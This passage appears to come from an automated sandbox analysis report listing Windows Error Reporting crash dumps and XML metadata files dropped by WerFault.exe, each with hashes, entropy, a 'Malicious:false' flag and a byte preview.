                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB9.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.466918054842349
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYeFnYm8M4J40Ft+q8xDPsJLYhsd:uIjfLI7+S7VBF6JRGPsFYhsd
                  MD5:0BCE98873F135A82DE855C51FB63D3F6
                  SHA1:62936F867FC1FC22B5B106217C95D1188F9F4A51
                  SHA-256:DCF38D42862F47E475858B499DEED799262187781DD77BD15B9AD6C0D0192E3F
                  SHA-512:38CC6715CF965923466145E43E932FB1A6F1A5656EA495CB44C5FD9F41937A689A455BB20E4894AE0C24176A948B2EC6959B3A215A9B7E6A2E59D82DD67A9407
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D28.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:01 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):80938
                  Entropy (8bit):2.1033527158865586
                  Encrypted:false
                  SSDEEP:384:WN7PZTf6Tqvpv7Q+sgQuTjYTT2XbtfUXeZ9nxRBweI+:WNFrXvpvLsBuTMTT2rNUXuxIe
                  MD5:E9F92A6FB04A01C4C82141F63B5682C1
                  SHA1:78DDD75299D5EC791B5C2FE266F3E2209E0CFBF9
                  SHA-256:03DBF0518C09387B824A8A9CE6ECD5DDE674809C1D25D196A65E0D0170A2087B
                  SHA-512:4494487C95F7FBC685CDE861835B94C514DD659C18826A4111F4EB7C25D897843C9029F8E9FA76A3E8C0B036A00F5EB242775AB993EF9FD793A3DDB027D1CB02
                  Malicious:false
                  Preview:MDMP..a..... .......%..f....................................<...|.......D....:..........`.......8...........T...........p"..........................................................................................................eJ......<.......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D96.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6981908636732306
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCI6Y6Y2D+SU6nBGgmfBTrpBP89bbHsfBJm:R6lXJ16Y6YzSUlgmflkbMfe
                  MD5:DEAB7B4FC97CD4467AFC07C50B305D75
                  SHA1:91A0DF32B049B9D4266B1178E7450054A967A46F
                  SHA-256:BC1CC8324B7B7C443E9FDF4551111D97C8E4BE301E72FAA1E6D978EEA328B11F
                  SHA-512:1261AB8D4666780084FE83964A3495BB3728EFD57407F78EF8747172255A8FC0EAF0E5E25D5428D7625D9C13E87E46224CD15BE1405BCF46B9CEAF1D88FBD207
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DC6.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.466596329243718
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYiYm8M4J40FC+q8xDPsJLYhsd:uIjfLI7+S7VKJOGPsFYhsd
                  MD5:F073FBAF65096E8A2017FEF2C1B00243
                  SHA1:6080C22B98AB19E2882C2DA6924267FBB9C026E5
                  SHA-256:E5881E829E184B06E0647A603999C72E61930965E6DE9DC654A60DA11A470A24
                  SHA-512:ED268A92107E154700B5D9E8B2E43DA0D7AFB0B1E202B939E691535B1022C9F7B0CC7C79FEC8BF7807CD9765A69356A0E6ECEFD6F915F98A5843903F439F0B11
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FA9.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):84984
                  Entropy (8bit):2.2253220906066256
                  Encrypted:false
                  SSDEEP:384:Y0PZTf6TqhvpuUYQfEmuFrzgOArzTqivYTa2XbtfUXeZ9nxLJAAu/n:YarRvpuUVEZF/gZTqiQTa2rNUXux6Au
                  MD5:1F1F9C6D29808F27363DAF1DA37DE638
                  SHA1:C6E8AB40D9EA206CC833FF39272A3077E15E3B26
                  SHA-256:9B5645FB8D081450AB695175E686DD9141D0839F92CC7D32746C85CAF1AA26AE
                  SHA-512:A07956FBF5AF892B2B7CDA231DBB799A08DF00E4A11A37EAB7EB9F54B908F499BFBA7191D7A88963BC8585DB4D68063BF46C410CCA2A3D9D562ED9EB22B7A688
                  Malicious:false
                  Preview:MDMP..a..... .......&..f....................................<...|.......t....:..........`.......8...........T............"..8)......................................................................................................eJ......<.......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3017.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.7008216570069044
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCP6pb+6Y2D7SU2cy0jgmfBTrpBa89bgHsfGgm:R6lXJC686Y2SUtRjgmflXgMfY
                  MD5:EFBE90C2FC0B775A70C1E068CF771A01
                  SHA1:A554DB9A1553B7B2E802F6124D907B440D8A5C7A
                  SHA-256:000853A07071F09E41779FAC2C36A42BBA2210840961A066D94A42A7D7D107DE
                  SHA-512:B8C753D42001C5B960AAA9B109D3FDA965A84CB42BB572427FBF72FC383E091E439E3B33234CD70AD2E01BE2B758641537BF0CEE5CDCF74D6A0D18509EDC3ED3
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3037.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.465049546111846
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VY0Ym8M4J40Fu+q8xDPsJLYhsd:uIjfLI7+S7VkJCGPsFYhsd
                  MD5:C3322AC578488AAD62F36963A186324B
                  SHA1:62DD46D8B099F3D294BCC1CA4653495E14CAAE1B
                  SHA-256:7DD63DF452FACD9AF41C78864CD77D215BD0FA69455973D1AB461210E4A6C46C
                  SHA-512:90A102B28EEE8430E59B996FBCC4EFB493D05AEBF2771749522C6552AE3E896EDC319EFB608C21A8B1C52BFF8DFEAFEA9F7F5A730E097AD78CB10B3C6262EB72
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3287.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):80396
                  Entropy (8bit):2.1443725918704124
                  Encrypted:false
                  SSDEEP:768:B6CKvp5KssJmYYTZMS0NUXuxbjZwZuLun:pS5kmTT1KUXuxbjZwZ86
                  MD5:16AB8FFCC4D1A18A9CC96E9A836019B0
                  SHA1:E688E203BA0A934D541F56287864650E1925229E
                  SHA-256:E9D317E6B9BA4AB2E151D4CABB84E130CBABD71ED04464C4FDBB7CC02914B94A
                  SHA-512:1D73BAB103C445217E946F9B443F2F7B8F69DBC3C4C6F1B38BD2AE49250D985371C143E06DD36AD9F2614484563C6691996CA09AC698AF82B1E25671A6C3BDE0
                  Malicious:false
                  Preview:MDMP..a..... .......'..f........................P...........<...........4....:..........`.......8...........T...........8#..............$...........................................................................................eJ..............GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER32F5.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6990931410760512
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCF6yT6Y2DWSU2cy0jgmfBTrpBP89bpHsf2jm:R6lXJY6u6Y7SUtRjgmflkpMfT
                  MD5:2CE1912D0501C4E954D127D71FB45C30
                  SHA1:5A7D5AF3D139124880D7087C8854E64BEF3EF859
                  SHA-256:36A6EDA051098FD2981D374303FBFF481DC326FD6A00D45ADD8E672C53CC20FF
                  SHA-512:5796699ECAB17A1841BFA7CF862A37794A18F2855C92023F5B05D86BFD0B03DCD33A4AF2E3C73D3291E79A052A3C126AA7E34D0BF6CEF613C59A70E06FD7E981
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3325.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.463516599895248
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYfXYm8M4J40FYd+q8xDPsJLYhsd:uIjfLI7+S7VYKJcGPsFYhsd
                  MD5:C99BAD0F204B046CEDF5F165563F334E
                  SHA1:9DCA2467D04D09F283C8A835B44AC5ECCF907B6E
                  SHA-256:F3E3AC6534E8854B3987C353A98E636235EC4A1C985508CFA6BA0311405D748C
                  SHA-512:0730EFBE7986000CEBC239A0DCF0EFDF08D53D25A54756B8DD9940235CA50CE2A7BE4DEF8BE49CC67E66354FB7A20A11714A4CF93F1C6549F0665CB102948892
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3611.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):87990
                  Entropy (8bit):2.1266135777787425
                  Encrypted:false
                  SSDEEP:384:TCBTeLRavpN4I0smgS9UVQ0WRUJbdCrjtfUXeZ9nxiirzEHCwpC:TgS1avpNishSmVXh7qjNUXuxDEiD
                  MD5:B9123197A4C2C574C3D5A01644C92DB2
                  SHA1:BA8C0F7BA5F85C797C2821B20EA2933170BC6DB4
                  SHA-256:7E70A541310CF1C081DFE95147DFDAB3A67917100D1409AAB8AB26B55F156886
                  SHA-512:000E64938E942C85F5D506BE1D091A292EC046D1E240F3250662A908BC6150E0B40B0E689DE99B62492FB3AF16A2F26324956FCD33306AE1925E4F7DBC518BE1
                  Malicious:false
                  Preview:MDMP..a..... .......'..f........................P...........<................=..........`.......8...........T............#...4..........T...........@...............................................................................eJ..............GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER36ED.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6998485656372155
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC0b6qtv6Y2DmSUeVvgmfBTrpBy89b2HsfNSm:R6lXJRb6w6YbSU8gmfl/2MfJ
                  MD5:2DAE3CF1A504FCA88AA70FBA841DBE34
                  SHA1:AD82A68F76E04781691C7241B1A2A829B51FD92E
                  SHA-256:2C34285D8A21CB7FFB40C88E9E942BCBB71C0418A058DA7188EE01D2F1D0A4DE
                  SHA-512:1A4F5F8D972B62965740BAFB2846FE3F58CC87158F93B2584166D0E348550FC6D8D7AF1F5F8E412FCC8F375B5C35E9B600CDD2D2B8CF9681A56C9168DE344F2E
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER372C.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.465041512303174
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYAYm8M4J40FMou+q8xDPsJLYhsd:uIjfLI7+S7VwJ8GPsFYhsd
                  MD5:EEC41522C3B7A29E99CB9DE08318C940
                  SHA1:B361F6C95002A157C35DBD3BE9004CC854987485
                  SHA-256:08D4F8EF19336B93EDF8C964C9073FCB610EF3FDBEAB1F68E4F922C05432CC74
                  SHA-512:82D54DFF49C62E0B4348AC93474ADA4048BD24DD4BF7A8CA13EEE1814C159860AA3A8AB9EBDD954F3D1306478BE92AA6172044EB482B95E245232F40B3ECB248
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER397C.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:04 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):104278
                  Entropy (8bit):2.103389881446042
                  Encrypted:false
                  SSDEEP:768:cB1TMJGZvp1TxeshJVSVG0dKrDUXuNJKhfHE:WTMg1T/VXDUXuNUhfHE
                  MD5:ACF685593F5BEB93169D6CCABA3CF2BF
                  SHA1:D5EA09985F2A7228FE2FD06C5D855826DD4349B8
                  SHA-256:99ADC10B8EA3472EDCDB00B5F5A7AA62DD2435BA8F69B0677304DA0759EFBABE
                  SHA-512:844403EE4BD9D376299F55DD12DBA609D603E12116F0F567209D04C19726759BF5884590ED90164C270887B466DEFA94553775AE60BD3069DFA61EF2FB1814C4
                  Malicious:false
                  Preview:MDMP..a..... .......(..f........................`...(.......<...........d...PJ..........`.......8...........T............+..Nl.......................!..............................................................................eJ......H"......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A87.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8342
                  Entropy (8bit):3.698795727869111
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC26y6Y2DDSUJhvgmfBTrpBM89b2HsfBSm:R6lXJr6y6YuSUJ5gmflN2MfV
                  MD5:4AA7E5A8F05DA985B19EBD859AEECDBF
                  SHA1:8C90AEF97080103C24EA6503ADEDB1B759111054
                  SHA-256:9062BA19F050C607C07EDD21A6AB57235A87548CB998A4F62FB9BD093875820A
